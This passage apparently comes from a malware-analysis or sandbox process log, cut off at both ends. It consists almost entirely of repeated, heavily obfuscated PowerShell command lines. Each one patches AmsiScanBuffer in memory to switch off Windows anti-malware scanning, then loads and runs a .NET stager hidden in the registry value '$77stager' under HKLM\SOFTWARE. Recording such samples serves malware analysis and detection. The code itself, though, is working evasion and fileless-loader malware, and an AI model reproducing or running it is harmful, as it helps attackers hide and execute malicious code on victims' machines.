Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+'me'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $NldJaRrIbsn.CreateType();}$WxjbEseXszpzA=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+'t'+''+[Char](101)+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+'r'+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+''+[Char](101)+''+'M'+'e'+[Char](116)+''+[Char](104)+'o'+[Char](100)+'s');$YfSRyltrsuPabn=$WxjbEseXszpzA.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+'r'+[Char](111)+''+[Char](99)+'A'+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TrFzAxjgWCzbzGrVYmT=zxorTJThwHcX @([String])([IntPtr]);$CdRzoMuXbuemSwBNHhVzWU=zxorTJThwHcX @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$DOMSDqXBpTV=$WxjbEseXszpzA.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'uleH'+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'rn'+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'d'+[Char](108)+'l')));$fUrAuKiCJXFydB=$YfSRyltrsuPabn.Invoke($Null,@([Object]$DOMSDqXBpTV,[Object](''+'L'+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+'y'+''+'A'+'')));$gybKjliSKBvhfacqb=$YfSRyltrsuPabn.Invoke($Null,@([Object]$DOMSDqXBpTV,[Object](''+'V'+''+[Char](105)+''+'r'+'t'+'u'+'al'+'P'+'ro'+[Char](116)+''+'e'+''+'c'+''+'t'+'')));$SFPEWsT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fUrAuKiCJXFydB,$TrFzAxjgWCzbzGrVYmT).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+'d'+''+[Char](108)+'l');$esGVXNQcsSCqSsDDZ=$YfSRyltrsuPabn.Invoke($Null,@([Object]$SFPEWsT,[Object](''+'A'+''+'m'+''+[Char](115)+'i'+[Char](83)+''+'c'+''+[Char](97)+''+[Char](110)+''+'B'+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+''+'r'+'')));$LKrHEiLZSr=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gybKjliSKBvhfacqb,$CdRzoMuXbuemSwBNHhVzWU).Invoke($esGVXNQcsSCqSsDDZ,[uint32]8,4,[ref]$LKrHEiLZSr);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$esGVXNQcsSCqSsDDZ,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gybKjliSKBvhfacqb,$CdRzoMuXbuemSwBNHhVzWU).Invoke($esGVXNQcsSCqSsDDZ,[uint32]8,0x20,[ref]$LKrHEiLZSr);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](55)+''+'7'+'st'+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rvxMZTkMpyQp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EzTmArczzUJKCb,[Parameter(Position=1)][Type]$DmoLPnzaPg)$XpfGkxkswfe=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+'a'+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+'m'+''+[Char](111)+''+'r'+'yM'+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+'T'+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+'a'+'l'+''+'e'+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+'C'+'l'+[Char](97)+''+'s'+'s'+[Char](44)+'A'+'u'+''+[Char](116)+''+[Char](111)+'C'+'l'+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$XpfGkxkswfe.DefineConstructor('RTS'+'p'+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+','+'H'+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+'Si'+[Char](103)+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EzTmArczzUJKCb).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'im'+[Char](101)+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$XpfGkxkswfe.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Pu'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'lo'+[Char](116)+','+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$DmoLPnzaPg,$EzTmArczzUJKCb).SetImplementationFlags(''+'R'+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+',M'+[Char](97)+'na'+[Char](103)+'e'+[Char](100)+'');Write-Output $XpfGkxkswfe.CreateType();}$FwKQeFsGXPHlw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'W'+[Char](105)+''+[Char](110)+''+[Char](51)+''+[Char](50)+'.'+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+'t'+'i'+''+[Char](118)+'e'+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$vvLsdOmPnBVvqj=$FwKQeFsGXPHlw.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+'r'+''+'o'+'c'+[Char](65)+''+'d'+'dr'+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](116)+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$JrWPoYgqfWJyvlCcmum=rvxMZTkMpyQp @([String])([IntPtr]);$BNnWsBkAUaBSXCLHUVlDjs=rvxMZTkMpyQp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ReqjyHaiped=$FwKQeFsGXPHlw.GetMethod('Ge'+'t'+''+[Char](77)+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+'H'+[Char](97)+''+[Char](110)+'d'+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+'dll')));$LZWiSIUQQNTEmX=$vvLsdOmPnBVvqj.Invoke($Null,@([Object]$ReqjyHaiped,[Object](''+[Char](76)+''+[Char](111)+''+'a'+''+'d'+'L'+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'ryA')));$nBkFGpewnOIpYQddM=$vvLsdOmPnBVvqj.Invoke($Null,@([Object]$ReqjyHaiped,[Object]('V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$siKuoES=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LZWiSIUQQNTEmX,$JrWPoYgqfWJyvlCcmum).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i.d'+[Char](108)+''+[Char](108)+'');$OAtxIihGQXQKBSFcN=$vvLsdOmPnBVvqj.Invoke($Null,@([Object]$siKuoES,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+''+[Char](101)+''+[Char](114)+'')));$PgwubLTahL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nBkFGpewnOIpYQddM,$BNnWsBkAUaBSXCLHUVlDjs).Invoke($OAtxIihGQXQKBSFcN,[uint32]8,4,[ref]$PgwubLTahL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OAtxIihGQXQKBSFcN,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($nBkFGpewnOIpYQddM,$BNnWsBkAUaBSXCLHUVlDjs).Invoke($OAtxIihGQXQKBSFcN,[uint32]8,0x20,[ref]$PgwubLTahL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+'O'+'F'+'T'+'W'+[Char](65)+''+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:vOqgGzTTLLxs{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$bxxVsuhhslGchs,[Parameter(Position=1)][Type]$tSutLjtfxH)$AXgTbHtorAX=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+'d'+''+[Char](68)+''+'e'+'l'+[Char](101)+'g'+'a'+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+'r'+''+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+'D'+[Char](101)+'l'+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'pe',''+[Char](67)+''+'l'+'a'+'s'+''+[Char](115)+','+[Char](80)+'ub'+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+'i'+''+'C'+''+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$AXgTbHtorAX.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+''+[Char](97)+''+'m'+''+[Char](101)+','+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+'S'+'i'+[Char](103)+''+[Char](44)+''+'P'+''+'u'+'b'+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$bxxVsuhhslGchs).SetImplementationFlags('R'+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'a'+[Char](110)+'age'+[Char](100)+'');$AXgTbHtorAX.DefineMethod(''+'I'+''+'n'+'v'+'o'+''+[Char](107)+'e',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+'g'+[Char](44)+'New'+'S'+''+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$tSutLjtfxH,$bxxVsuhhslGchs).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $AXgTbHtorAX.CreateType();}$aAuVVEretjMxv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+[Char](105)+''+[Char](99)+''+'r'+'o'+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.'+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+'fe'+[Char](78)+'a'+[Char](116)+'ive'+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$aktoTgHpoPeMLG=$aAuVVEretjMxv.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'r'+'o'+'cAd'+'d'+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BRzUTkAqPEXcYpDOvkK=vOqgGzTTLLxs @([String])([IntPtr]);$MTmcTvecpspNvbCilCquFQ=vOqgGzTTLLxs @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$SslZAPyDBKy=$aAuVVEretjMxv.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+'n'+''+[Char](101)+''+'l'+'3'+[Char](50)+''+[Char](46)+'dl'+'l'+'')));$hPUmEPXDARnMEM=$aktoTgHpoPeMLG.Invoke($Null,@([Object]$SslZAPyDBKy,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+'r'+[Char](97)+''+'r'+'y'+[Char](65)+'')));$XGaCFrXwNbBkAvmNL=$aktoTgHpoPeMLG.Invoke($Null,@([Object]$SslZAPyDBKy,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+[Char](97)+'l'+'P'+'r'+[Char](111)+'t'+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$jvspmEg=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($hPUmEPXDARnMEM,$BRzUTkAqPEXcYpDOvkK).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$ovyhAuaMuoNjqCsGe=$aktoTgHpoPeMLG.Invoke($Null,@([Object]$jvspmEg,[Object](''+[Char](65)+'m'+'s'+''+'i'+''+[Char](83)+'ca'+[Char](110)+'Bu'+[Char](102)+''+[Char](102)+'er')));$PrnuYGdhGb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XGaCFrXwNbBkAvmNL,$MTmcTvecpspNvbCilCquFQ).Invoke($ovyhAuaMuoNjqCsGe,[uint32]8,4,[ref]$PrnuYGdhGb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$ovyhAuaMuoNjqCsGe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($XGaCFrXwNbBkAvmNL,$MTmcTvecpspNvbCilCquFQ).Invoke($ovyhAuaMuoNjqCsGe,[uint32]8,0x20,[ref]$PrnuYGdhGb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+''+'F'+''+'T'+''+'W'+''+'A'+'R'+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7s'+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:xunEMqDgliDp{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hpywGRctRGBcun,[Parameter(Position=1)][Type]$oPjDZBIChI)$YSkmfTwQeuJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'at'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'odu'+[Char](108)+'e',$False).DefineType(''+'M'+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+'a'+'te'+[Char](84)+''+[Char](121)+''+[Char](112)+'e',''+'C'+''+[Char](108)+''+'a'+'ss'+[Char](44)+''+[Char](80)+''+'u'+'bl'+[Char](105)+''+'c'+''+','+'S'+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+'a'+'s'+[Char](115)+''+','+''+[Char](65)+''+[Char](117)+'to'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$YSkmfTwQeuJ.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+'e,Hid'+[Char](101)+''+'B'+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$hpywGRctRGBcun).SetImplementationFlags(''+'R'+''+'u'+'n'+[Char](116)+'i'+'m'+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+'g'+''+'e'+''+[Char](100)+'');$YSkmfTwQeuJ.DefineMethod('Invo'+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+'a'+'l'+'',$oPjDZBIChI,$hpywGRctRGBcun).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');Write-Output $YSkmfTwQeuJ.CreateType();}$omKmmURQlDxcP=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+'m'+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+'o'+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+'W'+'i'+''+[Char](110)+'3'+'2'+''+'.'+''+[Char](85)+''+'n'+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+'Na'+'t'+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+'t'+[Char](104)+''+[Char](111)+'d'+'s'+'');$paUEtrKINpbpGn=$omKmmURQlDxcP.GetMethod('G'+[Char](101)+''+'t'+'P'+[Char](114)+''+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+'d'+''+[Char](114)+''+'e'+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+'i'+'c,S'+[Char](116)+'at'+'i'+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HTLXYOaEzAAbWnsAAgf=xunEMqDgliDp @([String])([IntPtr]);$YpIomVHKJEGgYCgdhmJmMe=xunEMqDgliDp @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YwBduQETiVj=$omKmmURQlDxcP.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+'nd'+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+'e'+[Char](108)+''+'3'+'2'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$ozTdavVaDsULrL=$paUEtrKINpbpGn.Invoke($Null,@([Object]$YwBduQETiVj,[Object]('L'+'o'+''+'a'+''+'d'+''+'L'+''+'i'+''+[Char](98)+'ra'+'r'+''+'y'+'A')));$PLPiTZhdqtYRkHcyV=$paUEtrKINpbpGn.Invoke($Null,@([Object]$YwBduQETiVj,[Object]('Vir'+[Char](116)+'u'+'a'+'l'+'P'+'r'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+'t'+'')));$MvXREdF=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ozTdavVaDsULrL,$HTLXYOaEzAAbWnsAAgf).Invoke(''+[Char](97)+''+'m'+'s'+'i'+'.d'+[Char](108)+''+[Char](108)+'');$OjboeqaiCtaZywjhW=$paUEtrKINpbpGn.Invoke($Null,@([Object]$MvXREdF,[Object](''+[Char](65)+''+[Char](109)+'si'+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+'B'+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$WylwYJTrWh=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PLPiTZhdqtYRkHcyV,$YpIomVHKJEGgYCgdhmJmMe).Invoke($OjboeqaiCtaZywjhW,[uint32]8,4,[ref]$WylwYJTrWh);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$OjboeqaiCtaZywjhW,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PLPiTZhdqtYRkHcyV,$YpIomVHKJEGgYCgdhmJmMe).Invoke($OjboeqaiCtaZywjhW,[uint32]8,0x20,[ref]$WylwYJTrWh);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+'T'+''+[Char](87)+''+[Char](65)+'RE').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"2⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TpbRNRSlYotL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ijGoQZIBRWDBWK,[Parameter(Position=1)][Type]$oCydGCWoSj)$JOXfakYbkuR=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'le'+[Char](99)+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+'le'+'g'+'a'+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+[Char](101)+'m'+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+'e'+'g'+''+'a'+''+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+'e',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'ed'+[Char](44)+'An'+'s'+''+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+''+'s'+',A'+[Char](117)+'t'+[Char](111)+'Cl'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$JOXfakYbkuR.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+'c'+''+[Char](105)+''+'a'+''+[Char](108)+'Na'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+'i'+[Char](100)+''+[Char](101)+''+'B'+'y'+[Char](83)+''+[Char](105)+'g'+','+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ijGoQZIBRWDBWK).SetImplementationFlags(''+[Char](82)+''+'u'+'nt'+'i'+''+'m'+''+[Char](101)+','+[Char](77)+'ana'+[Char](103)+'ed');$JOXfakYbkuR.DefineMethod(''+'I'+'n'+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+',H'+[Char](105)+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+','+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+','+[Char](86)+'ir'+[Char](116)+''+'u'+''+[Char](97)+''+[Char](108)+'',$oCydGCWoSj,$ijGoQZIBRWDBWK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $JOXfakYbkuR.CreateType();}$moEXHclNNEKhU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 